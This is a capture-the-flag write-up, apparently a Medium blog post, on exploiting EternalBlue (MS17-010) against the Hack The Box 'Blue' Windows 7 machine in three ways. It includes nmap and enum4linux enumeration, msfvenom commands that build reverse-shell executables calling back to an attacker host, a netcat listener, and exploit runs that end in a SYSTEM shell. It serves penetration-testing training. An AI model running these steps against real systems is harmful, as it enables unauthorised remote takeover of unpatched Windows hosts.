Hack The Box — Blue (Exploiting MS17–010 Manually-3 ways)

Blue is a Easy rated Windows machine on Hack The Box and also OSCP like.We use the popular Eternal Blue exploit to get a Admin shell on the target.I have covered MS17–010 exploit manually in this writeup and also mentiond 1–2 other ways to exploit the vulnerability.I will also cover a error which you might face like “ImportError: No module named impacketand how to fix it

ENUMERATION

From the nmap scan,we see that port 123,139,445 and 49152–49157(running rpc) are open and the target is running windows 7 Professional 7601 Service Pack 1. Any pentester who has been in this field knows that windows 7 is vulnerable to the popular eternal blue exploit (MS17–010)

SO lets check if our target is vulnerable to eternal blue exploit. To do so we can use nmap’s nse script. Here i have used --script vuln which scans for CVE’s and in the image below we can clearly see VULNERABLE and MS17–010

You can also use another nmap script which specificly scans for eternal blue nmap --script smb-vuln-ms17–010.nse <target-ip>

again it shows VULNERABLE !!!

HOWEVER since we have smb on the target, lets see if we can access any share which can contain any usefl info.For this, we use smbclient

we list all shares

As we can see below, we can anonymously connect to the shares however we do not find any useful info here.

EXPLOITING ETERNALBLUE (MS17–010)

Here i will cover 3 different ways to use this exploit.DO NOTE that this exploit performs buffer overflow on target’s smb and might crash the target so reset the box if the exploit fails.

1)USING THE ORIGINAL EXPLOIT

This method requires a bit of hassle and is NOT RECOMMENDED.(i would suggest you to try 2 and 3) In this method we use the original script from searchsploit or exploitdb and we need to make mannual changes to the code such as the username and also a part of the code.

Here is another writeup which you can refer- https://infosecwriteups.com/tryhackme-relevant-ctf-write-up-7705501b73dd (This one is of a different box from tryhackme but the process is same)

We’re working with Windows 7 so we’ll use exploit # 42315. Clone the exploit into the working directory.

After looking at the source code, we need to do three things:

  1. Download mysmb.py since the exploit imports it. The download location is included in the exploit.
  2. Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload.

First, download the file and rename it to mysmb.py

wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py
mv 42315.py.1 mysmb.py

Second, use MSFvenom to generate a simple executable with a reverse shell payload.

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.6 LPORT=4444 > eternal-blue.exe

Third, we need change the exploit to add credentials. In our case we don’t have valid credentials, however, let’s check to see if guest login is allowed.

If you run enum4linux, you can see that guest login is supported.

enum4linux -a 10.10.10.40
  • -a: Do all simple enumeration

We’ll add that to the exploit script.

Similarly, we’ll add the reverse shell executable location and get the script to execute it.

Now that we’re done all three tasks, setup a listener on your attack machine.

nc -nlvp 4444

Then run the exploit.

python 42315.py 10.10.10.40

If everything works fine. We will get a shell with system privileges!

DO NOTE: IF YOU GET AN ERROR like“ImportError: No module named impacket” all you have to do is refer-https://stackoverflow.com/questions/65869381/pip2-installation-on-ubuntu-20-04

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
and then -> pip install impacket

Do note that if your python version is 2 and pip is also 2 then the exploit will work.

2)USING AUTOBLUE FROM GITHUB

https://github.com/3ndG4me/AutoBlue-MS17-010

Clone it and just run the shell_prep.sh script and set correct options

It will automatically create x64 and x86 shellcodes.Now finally run the exploit

python eternalblue_exploit7.py <target-ip> revershell

CATCH THE REVERSE SHELL ON NETCAT AND WE ARE SYSTEM USER !!!

2)USING SEND_AND_EXECUTE.PY FROM GITHUB

https://github.com/helviojunior/MS17-010

You can see below, we have a file called send_and_execute.py which is our main exploit.MAKE SURE TO EDIT the exploit script and set the username.

In our case, we set the username to guest

Now we need to make a reverseshell using msfvenom.Don’t forget to use EXITFUNC=threadin in the payload for it to work.(For this box, it was not working when i didn’t use it)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 EXITFUNC=thread -f exe -a x86 — platform windows -o ms17–010.exe

Finally, lets run our exploit

USAGE: python send_and_execute.py <target-ip> reverseshell

WE HAVE A SHELL AS SYSTEM!!!!

The 4th way is to use Metasploit which you can do easily :P

I hope you learned a lot from this writeup.Although this box was easy, fixing the impacket error and also the code mannually does take time.If you are looking for a similar box which uses EternalBlue, you can solve Relevant from TryHackMe.

Make sure to follow me here on Medium so that you dont miss such OSCP like writeups and articles -ZEUS

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Nibbles

TryHackme: Overpass by NinjaJc01

PNPT Writeup/Review

How to get Invite code in Hack The Box